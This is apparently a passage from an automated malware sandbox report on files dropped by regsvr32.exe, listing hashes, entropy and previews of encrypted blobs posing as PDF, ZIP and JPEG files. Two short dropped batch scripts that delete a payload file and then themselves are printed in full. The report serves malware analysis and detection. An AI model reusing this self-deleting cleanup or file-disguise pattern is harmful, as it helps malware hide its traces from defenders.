Preview:	_........Td......(..+D.dk..d`^P.:{K%Uw.9.............2..g....H..=._h._.....@..y.X.-5$e..V+Z1w....~hu."..,..`... %....}.$.8.\|.....t.f.kmT.RMN..Fr._..>P<C..tPH..r.K@.x..a...s.....N........Mx]..q.d.=..Z...B..K.[....W..>\8.]....Z.g..2l.o!.....H..8o.~.'../....d....5...G.......r._V$+.....\.UM)Ik.f.C.N./Q..X......!....5&.0..>...}.!...Q\.../..c.....0.F....i!...l..V........D.t....Z..P_...a..!.......EB.O......a\|b..j.+H.....X..b^.UR......3.:V.>9'..3.wX,G.sIbL.3.(..&.Y....\.r.......M.t..B.....`...D....=6..^SU.<>.P..,89......j....j...y.#.x.~... $....6.E.J.w.!..m..^;..S..}.....z.9.E...j..T....xT&.Z.N.@(^c..c...O....`+......p.Ns.@.D..v!..>......{..1..A..w.Q...g1w.w..../..X.(k..:...{.A.....,D:.. .,E3.#i....R.#'.2..Hn?.`......g.'+N!..!.j.k.-.....^&.!.QkT..O%\..4Wa.PC......1.].S)@.......n~.^...-.l.....z...L....H...)..t..l@QD....d..^....S.b.4.0..._.L.0...R00..D\|u...CP.=.'.-X...q....oN.,.`.(m..g6....0..7LC$...f:..@]%.w..Hd.TO.T$$..@%X.....k.*..;..7./..7W.

C:\ProgramData\temp\8848.tmp.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	PDF document, version 1.7
Category:	dropped
Size (bytes):	46860
Entropy (8bit):	7.995465174888598
Encrypted:	true
SSDEEP:	768:lohAa/dXJS+Keiq/5bP3AAdIqq5/3pZaY/2fdw1Bm+rVpuXbQ3:loGa7oel/5sv5Fg0BmOVK8
MD5:	2A81E20407E3D6853201B6DE8FBA93A2
SHA1:	5882D65CFDCDFA1B536C473D62D4E8293880ED39
SHA-256:	C5F7D69B29ECFBC6E043F2EE45C58612AD1B11F9069D8A934EC4E0F07C242CBC
SHA-512:	DF70E288768C93CFFF95152C4487657CDDB02810604AD7E9A50D69BE2467F375468D84A4D8CF152C096D7F0CD79F876BBEBE47C7F2C84AF54BF545C2645D7571
Malicious:	false
Preview:	%PDF-1.7..4 0 obj....)..Nj..:?Q.'...v..N.K./.k5T3.gg..A.i.Q..G.....Mk?......J.[V&.......O..Cc@.......Wx..`. 2...7..2r...Z.sq...^y...!..O s3....IP..J.....{?Z[.\|..z..grN.......K..v.............`....9MQ.gP....$....{...&/...P....g.W..a...\1.7...t...../...OT..[.b....#Nf.\|.i...@ON.X...i....+.....=.t!z.{.~..9..9.#.PjAv.d(...r..BA`V)..^........'...K.Z....F........Q..1..{....p.d..\6......{..U...k.)S....U0.A...V\|..K.D.L..3UV..G..;4pj..\O.KC.t.dH...S....<.l.A..K."..5{...T....r..b9..t.....YD...x..n..=.?.C.N....{V.u...z7..K.re)%U Mf.f....'N.....z.rTl.(.}...2N._.$r.4P.U.W......0w...._..V...LQ....R..y.II...M.9.M;.+0...;...$.E... .._.Ts.HJ...+'26.`<.......j.......Z.F..........W..,..5..E...Z..N...)[._./.Oq.'.H...f.s&8./.g\a.Q2..F..6....b...@1....m...c..........sj1.X........$a....^......W%>.6..c.....}..EH.-..........Y..+ .D2.i.fC.....r)\.@<.Y..F..ENN.W.7.K.EK....W.I.B....t-.-..6Ln..Av.a..J..L....~(.\|...y..........#..$H.G....f..W..2..."..Ejzu.....g.H^$.

C:\ProgramData\temp\8848.tmp.zip Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	46742
Entropy (8bit):	7.994725833905889
Encrypted:	true
SSDEEP:	768:K+43PSMUgz5hFx0ciY3+cWOKxODfM855etCqHCJKbD0ku4kg00vT/gWAiO:6f9Ug7rihfOKkDE85AH7gku4xfvDDq
MD5:	0621F0A226FC42B30391F5CF942CA495
SHA1:	3BA32AB15F7514DBB15C5BC6A58F32988328E62E
SHA-256:	762DA8C156E140357CC822C49DFCC8E1FD035A6F2800AE44876111D11EF83BBF
SHA-512:	58055F8828BCEC943FAA4D9FF8AD5D3C91EC5B32E6518A4D747E450CEBBDED2B5EE0B77B77BED3C1AB5D28EB6490CCC120075ABEE5E53AF576E1F2C5C3888922
Malicious:	false
Preview:	PK........\|W.S...............8848.tmpUT.....&a..&a..&a..XV.7...n...C....nP@\|.A\|.KA..i.......%../..>..=g.{.......3y.c...s.u7s...T.U... .,P,.p7.H.$...X$....$..R......B..Rf:V..:&F.O....=.LBjB...K.m..z?.u'......EJN.@.....l....Z.,DX.........`...:.......................IP..@C..@......Bb.!..,....NIx....Tn.\.1...R.mx.._i..........i.....xx...........+(ji......ZXZY....{xzy?y...."$.e.+pl\\|B.I.Y.9.y...E.U.5.u...>.wtvu.....OLNM......olnm..~;:>9=;.~qy./(H?.............._P.O..`..=....@x.C....+..Y.D.....}....g...}.~...X...g.u.O...Pa. .......t>..H.$.X..........c9.k.a.Ny.+..f.+.Z`vk.,......-.i...Ou-..Q.\L..2.~.....)+.';...C...O...g.Z2.d ....:.F.F..3.mj...KG...2f.....%...... '.6]x...^Wsc...3..g.T......@..f.4.D../&U..i..>.[(b.\|S..."T.......z...?.....%..R......?......NB.N .u....T(#nT.\|.#.......Ec...+h.{......f...m]Ow.f............D.6%..K.#...7(nH.72.....&.[.h.v.......0...uS#.<..^D.....^.Wk.8.^.8...z........bm'p*aM~...J.#..`G.9&..N.w.L.v..lU.P...`v....

C:\ProgramData\temp\8F38.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\9E5F.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\A3CB.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\A751.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\A94C.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\AE9B.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\BBC4.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\C011.tmp.bat Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	126
Entropy (8bit):	4.414464434628197
Encrypted:	false
SSDEEP:	3:CFF/NI9mTXZkREv5nnjpGODZkREv5nnjpxeQVAEgI98VH:C/FI9mTGQnnjpqQnnjpx9VhgI9EH
MD5:	8410AB3473CB58B9F78901BA5256048D
SHA1:	EE80D8F9FDA2FA89E59EAC4DFDA0CBD4E6E1F161
SHA-256:	18EFD55E1D931FF905F09EC9A9E70C560C577EFC0F21ED345E518F2E99B35C10
SHA-512:	0842117E49D1FB3058654125E427519889D60A5E54262CD5F814A94D782AB28E44A1C356AE8E2494686746521A60A92B86DBB9A3236848750F9303B5E28662EE
Malicious:	false
Preview:	.. :repeat.. del "C:\ProgramData\temp\BBF9.tmp".. if exist "C:\ProgramData\temp\BBF9.tmp" goto repeat.. del "%~f0"

C:\ProgramData\temp\C5CF.tmp.bat Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	124
Entropy (8bit):	4.600388939395919
Encrypted:	false
SSDEEP:	3:CFF/NI9mTXZkRE/Awd/BODZkRE/AdfKFQVAEgI98VH:C/FI9mTGoVLFVhgI9EH
MD5:	6DE26458039B1131B1937434C146B1F6
SHA1:	3E03D515E7B26DBAEE04D0A71C3AA4CE3D8BBE3D
SHA-256:	9E193B27F408B9EA2A791160B57162F181281BBDE6B2C7A1F4829AD3B153468E
SHA-512:	86854D68EB46AC17720493C65B9BBEC9BFF6BC759D3E5E2E25A1348621997AD5E471F15C929F3663AD7C68AEB601582DA88816D91076B31724C8CD355E414AEB
Malicious:	false
Preview:	.. :repeat.. del "C:\ProgramData\glK7UwV.pR9a".. if exist "C:\ProgramData\glK7UwV.pR9a" goto repeat.. del "%~f0"

C:\ProgramData\temp\C6B4.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\C72C.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\D219.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\EF72.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\F3E.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\F999.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
